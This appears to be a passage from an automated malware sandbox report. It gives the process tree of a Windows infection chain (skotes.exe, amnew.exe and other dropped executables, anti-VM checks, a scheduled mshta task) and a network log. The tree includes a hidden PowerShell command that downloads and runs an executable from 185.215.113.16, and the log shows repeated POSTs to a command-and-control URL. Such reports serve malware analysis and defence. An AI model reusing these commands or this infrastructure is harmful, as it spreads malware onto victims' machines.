                                                                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5220 -childID 3 -isForBrowser -prefsHandle 5264 -prefMapHandle 5276 -prefsLen 27145 -prefMapSize 244658 -jsInitHandle 1292 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {64f8ca16-0a64-4652-a591-c5597fd79f16} 6076 "\\.\pipe\gecko-crash-server-pipe.6076" tab
                                                                                9⤵
                                                                                  PID:1948
                                                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5400 -childID 4 -isForBrowser -prefsHandle 5488 -prefMapHandle 5484 -prefsLen 27145 -prefMapSize 244658 -jsInitHandle 1292 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {9766da65-e26e-4c03-8f42-279784d591d3} 6076 "\\.\pipe\gecko-crash-server-pipe.6076" tab
                                                                                  9⤵
                                                                                    PID:4740
                                                                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5508 -childID 5 -isForBrowser -prefsHandle 5684 -prefMapHandle 5680 -prefsLen 27145 -prefMapSize 244658 -jsInitHandle 1292 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {18a2669b-050e-47cd-b5bc-4b4f656b9176} 6076 "\\.\pipe\gecko-crash-server-pipe.6076" tab
                                                                                    9⤵
                                                                                      PID:1816
                                                                              • C:\Users\Admin\AppData\Local\Temp\1088438001\0f8ce684d7.exe
                                                                                "C:\Users\Admin\AppData\Local\Temp\1088438001\0f8ce684d7.exe"
                                                                                6⤵
                                                                                • Executes dropped EXE
                                                                                • System Location Discovery: System Language Discovery
                                                                                • Suspicious use of SendNotifyMessage
                                                                                PID:4588
                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                  C:\Windows\system32\cmd.exe /c schtasks /create /tn IP0NDmaQh2W /tr "mshta C:\Users\Admin\AppData\Local\Temp\ahb00aKjH.hta" /sc minute /mo 25 /ru "Admin" /f
                                                                                  7⤵
                                                                                  • System Location Discovery: System Language Discovery
                                                                                  PID:5244
                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                    schtasks /create /tn IP0NDmaQh2W /tr "mshta C:\Users\Admin\AppData\Local\Temp\ahb00aKjH.hta" /sc minute /mo 25 /ru "Admin" /f
                                                                                    8⤵
                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                    PID:5084
                                                                                • C:\Windows\SysWOW64\mshta.exe
                                                                                  mshta C:\Users\Admin\AppData\Local\Temp\ahb00aKjH.hta
                                                                                  7⤵
                                                                                  • Checks computer location settings
                                                                                  • System Location Discovery: System Language Discovery
                                                                                  PID:5012
                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'VTMZEVGJD6GVC5WRW71CZPT2AU5O57WY.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
                                                                                    8⤵
                                                                                    • Blocklisted process makes network request
                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                    • Downloads MZ/PE file
                                                                                    • System Location Discovery: System Language Discovery
                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                    PID:4288
                                                                                    • C:\Users\Admin\AppData\Local\TempVTMZEVGJD6GVC5WRW71CZPT2AU5O57WY.EXE
                                                                                      "C:\Users\Admin\AppData\Local\TempVTMZEVGJD6GVC5WRW71CZPT2AU5O57WY.EXE"
                                                                                      9⤵
                                                                                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                      • Checks BIOS information in registry
                                                                                      • Executes dropped EXE
                                                                                      • Identifies Wine through registry keys
                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                      • System Location Discovery: System Language Discovery
                                                                                      PID:2664
                                                                              • C:\Users\Admin\AppData\Local\Temp\1088439001\amnew.exe
                                                                                "C:\Users\Admin\AppData\Local\Temp\1088439001\amnew.exe"
                                                                                6⤵
                                                                                • Checks computer location settings
                                                                                • Executes dropped EXE
                                                                                • Drops file in Windows directory
                                                                                • System Location Discovery: System Language Discovery
                                                                                PID:5404
                                                                                • C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
                                                                                  "C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"
                                                                                  7⤵
                                                                                  • Downloads MZ/PE file
                                                                                  • Checks computer location settings
                                                                                  • Executes dropped EXE
                                                                                  • Adds Run key to start application
                                                                                  PID:5356
                                                                                  • C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe
                                                                                    "C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe"
                                                                                    8⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:3060
                                                                                    • C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe
                                                                                      "C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe"
                                                                                      9⤵
                                                                                      • Executes dropped EXE
                                                                                      • Loads dropped DLL
                                                                                      PID:6772
                                                                                  • C:\Users\Admin\AppData\Local\Temp\10001960101\con12312211221.exe
                                                                                    "C:\Users\Admin\AppData\Local\Temp\10001960101\con12312211221.exe"
                                                                                    8⤵
                                                                                    • Executes dropped EXE
                                                                                    • Suspicious use of SetThreadContext
                                                                                    • System Location Discovery: System Language Discovery
                                                                                    PID:3380
                                                                                    • C:\Users\Admin\AppData\Local\Temp\10001960101\con12312211221.exe
                                                                                      "C:\Users\Admin\AppData\Local\Temp\10001960101\con12312211221.exe"
                                                                                      9⤵
                                                                                      • Executes dropped EXE
                                                                                      PID:5380
                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 3380 -s 828
                                                                                      9⤵
                                                                                      • Program crash
                                                                                      PID:5680
                                                                                  • C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe
                                                                                    "C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe"
                                                                                    8⤵
                                                                                    • Executes dropped EXE
                                                                                    • Suspicious use of SetThreadContext
                                                                                    • System Location Discovery: System Language Discovery
                                                                                    PID:6740
                                                                                    • C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe
                                                                                      "C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe"
                                                                                      9⤵
                                                                                      • Executes dropped EXE
                                                                                      PID:6720
                                                                                    • C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe
                                                                                      "C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe"
                                                                                      9⤵
                                                                                      • Executes dropped EXE
                                                                                      • System Location Discovery: System Language Discovery
                                                                                      PID:6756
                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 6740 -s 976
                                                                                      9⤵
                                                                                      • Program crash
                                                                                      PID:6776
                                                                                  • C:\Users\Admin\AppData\Local\Temp\10005030101\12321321.exe
                                                                                    "C:\Users\Admin\AppData\Local\Temp\10005030101\12321321.exe"
                                                                                    8⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:7048
                                                                                  • C:\Users\Admin\AppData\Local\Temp\10005500101\alex12112.exe
                                                                                    "C:\Users\Admin\AppData\Local\Temp\10005500101\alex12112.exe"
                                                                                    8⤵
                                                                                    • Executes dropped EXE
                                                                                    • Suspicious use of SetThreadContext
                                                                                    • System Location Discovery: System Language Discovery
                                                                                    PID:1880
                                                                                    • C:\Users\Admin\AppData\Local\Temp\10005500101\alex12112.exe
                                                                                      "C:\Users\Admin\AppData\Local\Temp\10005500101\alex12112.exe"
                                                                                      9⤵
                                                                                      • Executes dropped EXE
                                                                                      • System Location Discovery: System Language Discovery
                                                                                      PID:6420
                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 1880 -s 960
                                                                                      9⤵
                                                                                      • Program crash
                                                                                      PID:6508
                                                                                  • C:\Users\Admin\AppData\Local\Temp\10008580101\fher.exe
                                                                                    "C:\Users\Admin\AppData\Local\Temp\10008580101\fher.exe"
                                                                                    8⤵
                                                                                    • Executes dropped EXE
                                                                                    • Suspicious use of SetThreadContext
                                                                                    • System Location Discovery: System Language Discovery
                                                                                    PID:5160
                                                                                    • C:\Users\Admin\AppData\Local\Temp\10008580101\fher.exe
                                                                                      "C:\Users\Admin\AppData\Local\Temp\10008580101\fher.exe"
                                                                                      9⤵
                                                                                      • Executes dropped EXE
                                                                                      PID:6352
                                                                                    • C:\Users\Admin\AppData\Local\Temp\10008580101\fher.exe
                                                                                      "C:\Users\Admin\AppData\Local\Temp\10008580101\fher.exe"
                                                                                      9⤵
                                                                                      • Executes dropped EXE
                                                                                      PID:1372
                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 5160 -s 808
                                                                                      9⤵
                                                                                      • Program crash
                                                                                      PID:6816
                                                                                  • C:\Users\Admin\AppData\Local\Temp\10008990101\95c0f4af36.exe
                                                                                    "C:\Users\Admin\AppData\Local\Temp\10008990101\95c0f4af36.exe"
                                                                                    8⤵
                                                                                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                    • Checks BIOS information in registry
                                                                                    • Executes dropped EXE
                                                                                    • Identifies Wine through registry keys
                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                    • System Location Discovery: System Language Discovery
                                                                                    PID:5752
                                                                                  • C:\Users\Admin\AppData\Local\Temp\10009000101\4c708b9de9.exe
                                                                                    "C:\Users\Admin\AppData\Local\Temp\10009000101\4c708b9de9.exe"
                                                                                    8⤵
                                                                                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                    • Checks BIOS information in registry
                                                                                    • Executes dropped EXE
                                                                                    • Identifies Wine through registry keys
                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                    • System Location Discovery: System Language Discovery
                                                                                    PID:6564
                                                                              • C:\Users\Admin\AppData\Local\Temp\1088440001\f613a12ef8.exe
                                                                                "C:\Users\Admin\AppData\Local\Temp\1088440001\f613a12ef8.exe"
                                                                                6⤵
                                                                                • Executes dropped EXE
                                                                                • Suspicious use of SetThreadContext
                                                                                • System Location Discovery: System Language Discovery
                                                                                PID:6828
                                                                                • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                  "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                                                                                  7⤵
                                                                                  • System Location Discovery: System Language Discovery
                                                                                  PID:5148
                                                                              • C:\Users\Admin\AppData\Local\Temp\1088441001\c6a31d1295.exe
                                                                                "C:\Users\Admin\AppData\Local\Temp\1088441001\c6a31d1295.exe"
                                                                                6⤵
                                                                                • Executes dropped EXE
                                                                                PID:6388
                                                                              • C:\Users\Admin\AppData\Local\Temp\1088442001\0519cf3c64.exe
                                                                                "C:\Users\Admin\AppData\Local\Temp\1088442001\0519cf3c64.exe"
                                                                                6⤵
                                                                                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                • Checks BIOS information in registry
                                                                                • Executes dropped EXE
                                                                                • Identifies Wine through registry keys
                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                • Suspicious use of SetThreadContext
                                                                                • System Location Discovery: System Language Discovery
                                                                                PID:7104
                                                                                • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                  "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                                                                                  7⤵
                                                                                    PID:6868
                                                                      • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                        C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                        1⤵
                                                                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                        • Checks BIOS information in registry
                                                                        • Executes dropped EXE
                                                                        • Identifies Wine through registry keys
                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                        PID:2276
                                                                      • C:\ProgramData\cqgurj\okhxpkh.exe
                                                                        C:\ProgramData\cqgurj\okhxpkh.exe start2
                                                                        1⤵
                                                                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                        • Checks BIOS information in registry
                                                                        • Executes dropped EXE
                                                                        • Identifies Wine through registry keys
                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                        • System Location Discovery: System Language Discovery
                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                        PID:2432
                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3360 -ip 3360
                                                                        1⤵
                                                                          PID:4360
                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 3952 -ip 3952
                                                                          1⤵
                                                                            PID:1904
                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 1948 -ip 1948
                                                                            1⤵
                                                                              PID:3320
                                                                            • C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
                                                                              "C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
                                                                              1⤵
                                                                                PID:2640
                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 5604 -ip 5604
                                                                                1⤵
                                                                                  PID:5712
                                                                                • C:\Windows\system32\svchost.exe
                                                                                  C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
                                                                                  1⤵
                                                                                    PID:6120
                                                                                  • C:\ProgramData\wqbs\lpsbw.exe
                                                                                    C:\ProgramData\wqbs\lpsbw.exe start2
                                                                                    1⤵
                                                                                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                    • Checks BIOS information in registry
                                                                                    • Executes dropped EXE
                                                                                    • Identifies Wine through registry keys
                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                    • System Location Discovery: System Language Discovery
                                                                                    PID:5816
                                                                                  • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                    C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                    1⤵
                                                                                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                    • Checks BIOS information in registry
                                                                                    • Executes dropped EXE
                                                                                    • Identifies Wine through registry keys
                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                    PID:4544
                                                                                  • C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
                                                                                    "C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
                                                                                    1⤵
                                                                                      PID:5652
                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 3380 -ip 3380
                                                                                      1⤵
                                                                                        PID:3784
                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 6740 -ip 6740
                                                                                        1⤵
                                                                                          PID:6764
                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 1880 -ip 1880
                                                                                          1⤵
                                                                                            PID:4580
                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 5160 -ip 5160
                                                                                            1⤵
                                                                                              PID:6284
                                                                                            • C:\ProgramData\wqbs\lpsbw.exe
                                                                                              C:\ProgramData\wqbs\lpsbw.exe start2
                                                                                              1⤵
                                                                                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                              • Executes dropped EXE
                                                                                              • Identifies Wine through registry keys
                                                                                              PID:5680
                                                                                            • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                              C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                              1⤵
                                                                                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                              • Executes dropped EXE
                                                                                              • Identifies Wine through registry keys
                                                                                              PID:5944

                                                                                            Network

                                                                                            • flag-us
                                                                                              DNS
                                                                                              g.bing.com
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              g.bing.com
                                                                                              IN A
                                                                                              Response
                                                                                              g.bing.com
                                                                                              IN CNAME
                                                                                              g-bing-com.ax-0001.ax-msedge.net
                                                                                              g-bing-com.ax-0001.ax-msedge.net
                                                                                              IN CNAME
                                                                                              ax-0001.ax-msedge.net
                                                                                              ax-0001.ax-msedge.net
                                                                                              IN A
                                                                                              150.171.28.10
                                                                                              ax-0001.ax-msedge.net
                                                                                              IN A
                                                                                              150.171.27.10
                                                                                            • flag-us
                                                                                              GET
                                                                                              https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=00851a9fda1445fca7ea54edf0c58316&localId=w:7A7CDDEC-10AD-70C3-CBA3-32B71A66CD90&deviceId=6755478849407355&anid=
                                                                                              Remote address:
                                                                                              150.171.28.10:443
                                                                                              Request
                                                                                              GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=00851a9fda1445fca7ea54edf0c58316&localId=w:7A7CDDEC-10AD-70C3-CBA3-32B71A66CD90&deviceId=6755478849407355&anid= HTTP/2.0
                                                                                              host: g.bing.com
                                                                                              accept-encoding: gzip, deflate
                                                                                              user-agent: WindowsShellClient/9.0.40929.0 (Windows)
                                                                                              Response
                                                                                              HTTP/2.0 204
                                                                                              cache-control: no-cache, must-revalidate
                                                                                              pragma: no-cache
                                                                                              expires: Fri, 01 Jan 1990 00:00:00 GMT
                                                                                              set-cookie: MUID=18AA9BB124A167FF18248E28252A66FD; domain=.bing.com; expires=Tue, 17-Mar-2026 00:32:32 GMT; path=/; SameSite=None; Secure; Priority=High;
                                                                                              strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                              access-control-allow-origin: *
                                                                                              x-cache: CONFIG_NOCACHE
                                                                                              accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              x-msedge-ref: Ref A: AA20FE8ED165493ABE0D959835BE1851 Ref B: FRA31EDGE0409 Ref C: 2025-02-20T00:32:32Z
                                                                                              date: Thu, 20 Feb 2025 00:32:31 GMT
                                                                                            • flag-us
                                                                                              GET
                                                                                              https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=00851a9fda1445fca7ea54edf0c58316&localId=w:7A7CDDEC-10AD-70C3-CBA3-32B71A66CD90&deviceId=6755478849407355&anid=
                                                                                              Remote address:
                                                                                              150.171.28.10:443
                                                                                              Request
                                                                                              GET /neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=00851a9fda1445fca7ea54edf0c58316&localId=w:7A7CDDEC-10AD-70C3-CBA3-32B71A66CD90&deviceId=6755478849407355&anid= HTTP/2.0
                                                                                              host: g.bing.com
                                                                                              accept-encoding: gzip, deflate
                                                                                              user-agent: WindowsShellClient/9.0.40929.0 (Windows)
                                                                                              cookie: MUID=18AA9BB124A167FF18248E28252A66FD
                                                                                              Response
                                                                                              HTTP/2.0 204
                                                                                              cache-control: no-cache, must-revalidate
                                                                                              pragma: no-cache
                                                                                              expires: Fri, 01 Jan 1990 00:00:00 GMT
                                                                                              set-cookie: MSPTC=TmBHHYJZL-c1JbHSzwt2z99htc6nM0_CjiWLENvmiWQ; domain=.bing.com; expires=Tue, 17-Mar-2026 00:32:32 GMT; path=/; Partitioned; secure; SameSite=None
                                                                                              strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                              access-control-allow-origin: *
                                                                                              x-cache: CONFIG_NOCACHE
                                                                                              accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              x-msedge-ref: Ref A: B145BE659973450DB626DFB2D5124F08 Ref B: FRA31EDGE0409 Ref C: 2025-02-20T00:32:32Z
                                                                                              date: Thu, 20 Feb 2025 00:32:31 GMT
                                                                                            • flag-us
                                                                                              GET
                                                                                              https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=00851a9fda1445fca7ea54edf0c58316&localId=w:7A7CDDEC-10AD-70C3-CBA3-32B71A66CD90&deviceId=6755478849407355&anid=
                                                                                              Remote address:
                                                                                              150.171.28.10:443
                                                                                              Request
                                                                                              GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=00851a9fda1445fca7ea54edf0c58316&localId=w:7A7CDDEC-10AD-70C3-CBA3-32B71A66CD90&deviceId=6755478849407355&anid= HTTP/2.0
                                                                                              host: g.bing.com
                                                                                              accept-encoding: gzip, deflate
                                                                                              user-agent: WindowsShellClient/9.0.40929.0 (Windows)
                                                                                              cookie: MUID=18AA9BB124A167FF18248E28252A66FD; MSPTC=TmBHHYJZL-c1JbHSzwt2z99htc6nM0_CjiWLENvmiWQ
                                                                                              Response
                                                                                              HTTP/2.0 204
                                                                                              cache-control: no-cache, must-revalidate
                                                                                              pragma: no-cache
                                                                                              expires: Fri, 01 Jan 1990 00:00:00 GMT
                                                                                              strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                              access-control-allow-origin: *
                                                                                              x-cache: CONFIG_NOCACHE
                                                                                              accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              x-msedge-ref: Ref A: 8ECE3F0CB8824EAAB6E36B289EA9EB60 Ref B: FRA31EDGE0409 Ref C: 2025-02-20T00:32:32Z
                                                                                              date: Thu, 20 Feb 2025 00:32:31 GMT
                                                                                            • flag-gb
                                                                                              GET
                                                                                              https://www.bing.com/th?id=OADD2.10239414284817_1UVYYSBXC4CID8KBL&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=48&h=48&dynsize=1&qlt=90
                                                                                              Remote address:
                                                                                              2.18.27.82:443
                                                                                              Request
                                                                                              GET /th?id=OADD2.10239414284817_1UVYYSBXC4CID8KBL&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=48&h=48&dynsize=1&qlt=90 HTTP/2.0
                                                                                              host: www.bing.com
                                                                                              accept: */*
                                                                                              cookie: MUID=18AA9BB124A167FF18248E28252A66FD; MSPTC=TmBHHYJZL-c1JbHSzwt2z99htc6nM0_CjiWLENvmiWQ
                                                                                              accept-encoding: gzip, deflate, br
                                                                                              user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
                                                                                              Response
                                                                                              HTTP/2.0 200
                                                                                              cache-control: public, max-age=2592000
                                                                                              content-type: image/jpeg
                                                                                              access-control-allow-origin: *
                                                                                              access-control-allow-headers: *
                                                                                              access-control-allow-methods: GET, POST, OPTIONS
                                                                                              timing-allow-origin: *
                                                                                              report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QWthbWFp"}]}
                                                                                              nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
                                                                                              content-length: 1981
                                                                                              date: Thu, 20 Feb 2025 00:32:34 GMT
                                                                                              alt-svc: h3=":443"; ma=93600
                                                                                              x-cdn-traceid: 0.4c1a1202.1740011554.3ac29587
                                                                                            • flag-ru
                                                                                              GET
                                                                                              http://185.215.113.16/mine/random.exe
                                                                                              powershell.exe
                                                                                              Remote address:
                                                                                              185.215.113.16:80
                                                                                              Request
                                                                                              GET /mine/random.exe HTTP/1.1
                                                                                              Host: 185.215.113.16
                                                                                              Connection: Keep-Alive
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                              Date: Thu, 20 Feb 2025 00:32:31 GMT
                                                                                              Content-Type: application/octet-stream
                                                                                              Content-Length: 2134016
                                                                                              Last-Modified: Wed, 19 Feb 2025 23:46:05 GMT
                                                                                              Connection: keep-alive
                                                                                              ETag: "67b66d3d-209000"
                                                                                              Accept-Ranges: bytes
                                                                                            • flag-ru
                                                                                              POST
                                                                                              http://185.215.113.43/Zu7JuNko/index.php
                                                                                              skotes.exe
                                                                                              Remote address:
                                                                                              185.215.113.43:80
                                                                                              Request
                                                                                              POST /Zu7JuNko/index.php HTTP/1.1
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Host: 185.215.113.43
                                                                                              Content-Length: 4
                                                                                              Cache-Control: no-cache
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                              Date: Thu, 20 Feb 2025 00:32:53 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                              Refresh: 0; url = Login.php
                                                                                            • flag-ru
                                                                                              POST
                                                                                              http://185.215.113.43/Zu7JuNko/index.php
                                                                                              skotes.exe
                                                                                              Remote address:
                                                                                              185.215.113.43:80
                                                                                              Request
                                                                                              POST /Zu7JuNko/index.php HTTP/1.1
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Host: 185.215.113.43
                                                                                              Content-Length: 158
                                                                                              Cache-Control: no-cache
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                              Date: Thu, 20 Feb 2025 00:32:55 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                            • flag-ru
                                                                                              POST
                                                                                              http://185.215.113.43/Zu7JuNko/index.php
                                                                                              skotes.exe
                                                                                              Remote address:
                                                                                              185.215.113.43:80
                                                                                              Request
                                                                                              POST /Zu7JuNko/index.php HTTP/1.1
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Host: 185.215.113.43
                                                                                              Content-Length: 31
                                                                                              Cache-Control: no-cache
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                              Date: Thu, 20 Feb 2025 00:32:59 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                            • flag-ru
                                                                                              POST
                                                                                              http://185.215.113.43/Zu7JuNko/index.php
                                                                                              skotes.exe
                                                                                              Remote address:
                                                                                              185.215.113.43:80
                                                                                              Request
                                                                                              POST /Zu7JuNko/index.php HTTP/1.1
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Host: 185.215.113.43
                                                                                              Content-Length: 31
                                                                                              Cache-Control: no-cache
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                              Date: Thu, 20 Feb 2025 00:33:03 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                            • flag-ru
                                                                                              POST
                                                                                              http://185.215.113.43/Zu7JuNko/index.php
                                                                                              skotes.exe
                                                                                              Remote address:
                                                                                              185.215.113.43:80
                                                                                              Request
                                                                                              POST /Zu7JuNko/index.php HTTP/1.1
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Host: 185.215.113.43
                                                                                              Content-Length: 31
                                                                                              Cache-Control: no-cache
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                              Date: Thu, 20 Feb 2025 00:33:07 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                            • flag-ru
                                                                                              POST
                                                                                              http://185.215.113.43/Zu7JuNko/index.php
                                                                                              skotes.exe
                                                                                              Remote address:
                                                                                              185.215.113.43:80
                                                                                              Request
                                                                                              POST /Zu7JuNko/index.php HTTP/1.1
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Host: 185.215.113.43
                                                                                              Content-Length: 31
                                                                                              Cache-Control: no-cache
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                              Date: Thu, 20 Feb 2025 00:33:09 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                            • flag-ru
                                                                                              POST
                                                                                              http://185.215.113.43/Zu7JuNko/index.php
                                                                                              skotes.exe
                                                                                              Remote address:
                                                                                              185.215.113.43:80
                                                                                              Request
